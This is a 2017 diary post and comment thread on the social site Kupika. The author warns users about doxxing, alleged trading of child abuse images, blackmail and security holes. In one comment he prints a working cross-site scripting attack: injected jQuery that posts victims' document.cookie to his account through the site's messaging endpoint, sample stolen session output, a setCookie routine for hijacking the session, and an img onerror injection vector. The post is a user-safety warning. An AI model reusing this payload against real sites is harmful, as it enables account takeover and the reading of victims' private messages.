Why you have to stop using this site now. Login to Kupika  or  Create a new account 
 

This diary entry is written by mytestaccount. ( View all entries )
 

Why you have to stop using this site now.Category: (general)
Wednesday, 8 March 2017
03:50:02 PM (GMT)
It hid my last diary when I left, so redoing it here. Cissburry on an alt here.

My job is to make secure websites, this is site is so bad it's criminal.

Here's the facts.

1) You can be dox'ed(real identity revealed) at any time using this site, your email
address is completely insecure. I've contacted a few people on here to show them that
I know more than I should about them to show this (they are leaving or have left).
2) This site is chocked full of child porn, there's no other way to put this - people
are trading child porn on here constantly. They are sharing dropbox links of child
porn and images - this includes users of this site. We're talking hundreds of
pictures and videos, If you've uploaded something to this site, shared with somebody
on here - others (other than me and your intended recipient) have gotten these
pictures and put them in a collection they share between themselves.
3) All of your images are completely insecure, all of your nudes are available to
everybody.
4) People are blackmailing others on here, "if you don't do this I'll release your
nudes".
5) I've seen shit I'm not entirely sure whether I'll get in trouble for just
seeing... I felt sick and had to leave.
6) Code injection is beyond just possible on here, they pretty much make it a feature
of the website.
7) There are SQL venerabilities in a few pages - the maintenance of this site is
shocking.
8 ) People can make you do things on here like send messages on your behalf to
others.
9) If people continue to use this site, this dairy entry will be buried and forgotten
about, and others will take advantage of the venerabilities as they have been this
entire time - it's really best everybody simply stops using it and finds somewhere
else. Do not support a site that does nothing about people exchanging child porn and
blackmail - find another, there are many.

The last diary entry was much longer and explained all the vulnerabilities but you
should get the jist.

I hope that is clear. I'll pop back on to answer questions.

Summary: Stop using this site, remove your email address, delete your pictures,
exchange contact info with those you want to stay in contact with and delete your
account.

http://kupika.com/cancelaccount.php

I suggest people comment below with an alternative hangout. And for Gods sake stop
sending nudes!
Last edited: 8 March 2017

Comments 
Grizzlies says:   8 March 2017   355819  
thats spooky
 
‹Aeternum Vale› says:   8 March 2017   667688  
y u gotta scare me like this
I feel sick
pls tell me that none of this shit is true or I'll scream
I'm petrified of being doxxed don't do this ))))))));
 
gorebandit says:   8 March 2017   750534  
i mean this has kinda been known information since like 2008 when
over 100+ people would be on at once
kupikas always been sketchy, nothing new here lmao, its actually a lot
better now than it was in the past due to the lack of people
mytestaccount says:   8 March 2017   868434  
This place should have been killed a long time ago. I've reported the
child porn. I've contacted aristianto by email, facebook, every way I
could (no reply). And that's about all I can do other than make sure
those who thought they were safe know they were not.
 
mytestaccount says:   8 March 2017   268668  
@gorebandit Sadly a lot of people on here thought they were
safe, they did not know and were posting nudes and private information
in the expectation they were safe. They were not. 
 
gorebandit says:   8 March 2017   243819  
i dont know why he didnt just shut the site down when he abandoned it
tbh, he abandoned it for this exact reason
mytestaccount says:   8 March 2017   806817  
Some clarification may be in order.

Here's an example script that sends me a message whenever it runs. It
requires a jquery library to be loaded before it'll run.

window.onload = function() {
    if (window.jQuery) {  
        // jQuery is loaded  
	$(function() {
  		$('td[name=vo_up]').click();
		if(getCookie("nick") != "Cissburry") {
			$.post( "http://kupika.com/postsendmessage.php", { l:
document.cookie, mnick:"mytestaccount" } );
		}
	});
    } 
}

The output from that is something like.

remember=yes; nick=mytestaccount; kupikan=yes;
PHPSESSID=2aa4mon03q3s3rt3enqb8r6uv4"

That gives me your PHPSESSID, It's trivial to swap that I use.

function setCookie(cname, cvalue, exdays) {
    var d = new Date();
    d.setTime(d.getTime() + (exdays * 24 * 60 * 60 * 1000));
    var expires = "expires="+d.toUTCString();
    document.cookie = cname + "=" + cvalue + ";" + expires +
";path=/";
}

then setCookie("PHPSESSID","2aa4mon03q3s3rt3enqb8r6uv4",1) and I am
now logged in as you.

There are multiple ways to post these into any page, the easiest is by
XSS to another url.

A simple way to do this is.

img src="" onerror="javascript goes here"

in that area, I liked to load jquery and my XSS.

I can now read your most private messages because I'm logged in as
you.

This is not an elaborate hoax, this is demonstratable and trivial to
replicate, and this is just one of the many venerabilities. If you
still have questions I'll pop on to answer further questions.
 
‹Maïa› says:   9 March 2017   304875  
GaiaOnline.com it's a about the same but way more professional.
 
DrangonAngel says :   9 March 2017   655108  
this site has been fucked up from the beginning been here for years
always on a different account
 
 
HTML Tips

Related Entries
getintothegroove_x: Kupika, Go Fuck Yourself.
i_have_a_website: My newest website my website
amortentia: Diary 2 February
‹medusaaaa🍪›: I'm just gonna tell you new kids- .-.
BlueDiamondz15: I'M D0NE WITH KUPIKA


About Kupika    Contact    FAQs    Terms of Service    Privacy Policy    Online Safety
Copyright © 2005-2012